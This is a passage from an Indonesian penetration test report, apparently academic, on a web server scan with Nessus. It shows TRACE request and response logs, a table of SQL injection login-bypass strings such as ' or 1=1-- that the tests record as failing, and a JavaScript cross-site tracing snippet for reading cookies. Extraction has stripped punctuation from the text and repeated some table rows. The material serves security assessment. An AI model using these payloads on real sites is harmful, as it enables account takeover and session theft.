8
3. Penetration Test
Tahapan penetration test menindaklanjuti hasil yang diperoleh dari proses scanning.
Pada tool Nessus proses scanning dan penetration test dilakukan sekaligus.
3.1 XSS vulnerability
•
XST Penetration test jenis vulnerability ini
dilakukan dengan cara mengirimkan TRACE request kepada web server.
TRACE request dikirimkan oleh tool Nessus adalah sebagai berikut:
TRACE request : ------------------------------
TRACE Nessus1825069417.html HTTP1.1
Connection: Close Host: 172.18.78.53
Pragma: no-cache User-Agent: Mozilla4.0
compatible; MSIE 6.0; Windows NT 5.0
Accept: imagegif, imagex- xbitmap, imagejpeg, imagepjpeg,
imagepng, Accept-Language: en
Accept-Charset: iso-8859-1,,utf- 8
Respon yang diperoleh dari web server adalah sebagai berikut:
------------------------------ response from the remote server :
------------------------------ HTTP1.1 200 OK
Date: Wed, 03 Mar 2010 18:06:31 GMT
Server
: Apache2.2.4 LinuxSUSE Keep-Alive: timeout=15, max=100
Connection: Keep-Alive Transfer-Encoding: chunked
Content-Type: messagehttp
Tabel 7 String untuk menerobos halaman admin menggunakan teknik SQL Injection
String Makna
Hasil Pengujian or 1=1--
String ini akan dianggap seperti berikut or 1=1--, hal ini akan menyebabkan nilai nya
selalu benar karena logika OR akan bernilai selalu benar jika salah satu nilainya bernilai
benar. Hal ini menyebabkan hacker dapat masuk ke halaman admin
Tidak berhasil masuk ke halaman administrator
or 1=1 String ini akan dianggap seperti berikut or
1=1, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai
selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat
masuk ke halaman admin Tidak berhasil masuk ke halaman
administrator
or 1=1 String ini akan dianggap seperti berikut or
1=1, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai
selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat
masuk ke halaman admin Tidak berhasil masuk ke halaman
administrator
or 1=1 or = String ini akan dianggap seperti berikut or
1=1 or =, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan
bernilai selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker
dapat masuk ke halaman admin Tidak berhasil masuk ke halaman
administrator
or a=a String ini akan dianggap seperti berikut or
a=a, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai
selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat
masuk ke halaman admin Tidak berhasil masuk ke halaman
administrator
admin String ini akan menghapus statement SQL
yang ada setelah tanda , sehingga hanya terjadi pengecekan pada username saja.
Tidak berhasil masuk ke halaman administrator
admin String ini akan menghapus statement SQL
yang ada setelah tanda , sehingga hanya terjadi pengecekan pada username saja.
Tidak berhasil masuk ke halaman administrator
9
TRACE Nessus1825069417.html HTTP1.1
Connection: Keep-Alive Host: 172.18.78.53
Pragma: no-cache User-Agent: Mozilla4.0
compatible; MSIE 6.0; Windows NT 5.0
Accept: imagegif, imagex- xbitmap, imagejpeg, imagepjpeg,
imagepng, Accept-Language: en
Accept-Charset: iso-8859-1,,utf- 8
Respon yang
diperoleh menunjukkan bahwa metode TRACE
didukung oleh web server target. Untuk mendapatkan cookie dari website
dilakukan dengan cara mengeksekusi kode berikut ini di browser :
script type=”textjavascript” function xssDomainTraceRequest{
var exampleCode = “var xmlHttp = new
ActiveXObject\”Microsoft.XMLHTTP \”\;xmlHttp.open\”TRACE\”,\”htt
p:target\”,false\;xmlHttp.send \;xmlDoc=xmlHttp.responseText\;
alertxmlDoc\;”;
var target = “http:target”; cExampleCode =
encodeURIComponentexampleCode + ‘;top.close’;
var readyCode = ‘font- size:expressionexecScriptdecode
URIComponent“’ + cExampleCode + ‘”’;
showModalDialogtarget, null, readyCode;
}
script INPUT TYPE=BUTTON
OnClick=”xssDomainTraceRequest” VALUE=”Show Cookie Information
Using TRACE”
Kode tersebut dapat menampilkan cookie
dari website target
apabila sebelumnya client target pernah melakukan login ke halaman website
target.
•
Web server manual Web server manual dapat di-browse
dengan cara memasukkan URL http:targetmanual
pada browser.
Proses penetration test yang dilakukan hanya mengecek apakah web server
manual dapat di browse atau tidak.
•
Directory indexing Directory indexing dapat di-browse
dengan cara memasukkan URL http:targeticons
pada browser.
Proses penetration test yang dilakukan hanya mengecek apakah directory
dapat di-browse
atau tidak.
3.2 Denial of Service